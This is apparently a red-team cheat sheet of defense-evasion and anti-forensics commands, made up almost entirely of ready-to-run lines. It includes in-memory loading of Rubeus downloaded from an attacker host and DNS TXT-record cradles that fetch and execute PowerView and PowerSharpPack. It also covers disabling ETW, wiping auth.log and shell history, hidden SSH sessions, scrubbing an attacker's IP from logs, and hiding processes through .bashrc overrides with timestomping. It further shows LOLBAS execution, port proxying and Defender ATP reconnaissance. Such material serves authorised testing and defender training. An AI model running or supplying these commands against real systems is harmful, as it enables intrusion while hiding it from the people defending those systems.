- .NET Reflection
- Avoid Invoke-Expression (IEX) and Invoke-WebRequest (IWR)
- Bypassing Event Tracing for Windows (ETW)
- Clear Linux History
- Hiding SSH Sessions
- Logfile Cleaning
- LOLBAS
- Process Hiding
- ProxyChains
- Save File Deletion
- Sneaky Directory
- Windows Advanced Threat Protection (ATP)
PS C:\> $d = (New-Object System.Net.WebClient).DownloadData('http://<LHOST>/Rubeus.exe')
PS C:\> $a = [System.Reflection.Assembly]::Load($d)
PS C:\> [Rubeus.Program]::Main("-h".Split())Instead of using IEX and IWR within assessments, try this:
- Host a text record with the payload at one of the unburned domains
| Name | Type | Value | TTL |
|---|---|---|---|
| cradle1 | TXT | "IEX(New-Object Net.WebClient).DownloadString($URI)" | 3600 |
C:\> powershell . (nslookup -q=txt cradle1.domain.example)[-1]PS C:\> (nslookup -q=txt cradle1.domain.example)[-1]PS C:\> powershell '$URI=""""https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1"""";'(nslookup -q=txt cradle1.domain.example)[-1]';Get-Domain'Example with PowerSharpPack.
C:\> powershell
PS C:\> (nslookup -q=txt cradle1.domain.example)[-1]
PS C:\> powershell '$URI=""""https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpPack.ps1"""";'(nslookup -q=txt cradle1.example.domain)[-1]';PowerSharpPack'PS C:\> powershell . (-Join (Resolve-DnsName -Type txt https://<DOMAIN>).Strings)C:\> set COMPlus_ETWEnabled=0* echo "" > /var/log/auth.log
* echo "" > ~/.bash_history
* rm ~/.bash_history
* history -c
* export HISTFILESIZE=0
* export HISTSIZE=0
* kill -9 $$
* ln -sf /dev/null ~/.bash_history
* ln -sf /dev/null ~/.bash_history && history -c && exit$ ssh -o UserKnownHostsFile=/dev/null -T <USERNAME>@<RHOST> 'bash -i'- It is not added to
/var/log/utmp - It won't appear in the output of
worwhocommands - No
.profileor.bash_profilemodification needed
$ cd /dev/shm; grep -v '<RHOST>' /var/log/auth.log > <FILE>.log; cat <FILE>.log > /var/log/auth.log; rm -f <FILE>.logNotice that this modification of the logfile is most likely to be spotted.
<FILE>.url:
[internetshortcut]
url=C:\Windows\system32\calc.exeC:\Windows\system32> rundll32 C:\Windows\system32\ieframe.dll,OpenURL C:\<FILE>.urlC:\> netsh interface portproxy add v4tov4 listenaddress=<RHOST> listenport=<RPORT> connectaddress=<LHOST> connectport=<LPORT>$ echo 'ps(){ command ps "$@" | exec -a GREP grep -Fv -e <COMMAND> -e GREP; }' >> ~/.bashrc && touch -r /etc/passwd ~/.bashrc
$ echo 'top(){ command top "$@" | exec -a GREP grep -Fv -e <COMMAND> -e GREP; }' >> ~/.bashrc && touch -r /etc/passwd ~/.bashrc
$ echo 'htop(){ command htop "$@" | exec -a GREP grep -Fv -e <COMMAND> -e GREP; }' >> ~/.bashrc && touch -r /etc/passwd ~/.bashrc
$ echo 'procs(){ command procs "$@" | exec -a GREP grep -Fv -e <COMMAND> -e GREP; }' >> ~/.bashrc && touch -r /etc/passwd ~/.bashrc
$ echo 'pgrep(){ command pgrep "$@" | exec -a GREP grep -Fv -e <COMMAND> -e GREP; }' >> ~/.bashrc && touch -r /etc/passwd ~/.bashrc
$ echo 'pstree(){ command pstree "$@" | exec -a GREP grep -Fv -e <COMMAND> -e GREP; }' >> ~/.bashrc && touch -r /etc/passwd ~/.bashrc$ proxychains <APPLICATION>socks4 metasploit
socks5 ssh
socks4 127.0.0.1 1080
socks5 127.0.0.1 1080$ proxychains zsh
$ nmap -p 80 <RHOST>$ shred -z <FILE>Alternatively:
$ FN=<FILE>; dd bs=1k count="`du -sk \"${FN}\" | cut -f1`" if=/dev/urandom >"${FN}"; rm -f "${FN}"$ sudo mkdir -p /mnt/.../<DIRECTORY>Process:
- MsSense.exe
Service:
- Display name: Windows Defender Advanced Threat Protection Service
Name:
- Sense
Registry:
- HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection
File Paths:
- C:\Program Files\Windows Defender Advanced Threat Protection\
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection /sC:\> sc query sense
PS C:\> Get-Service SenseC:\> tasklist | findstr /i mssense.exe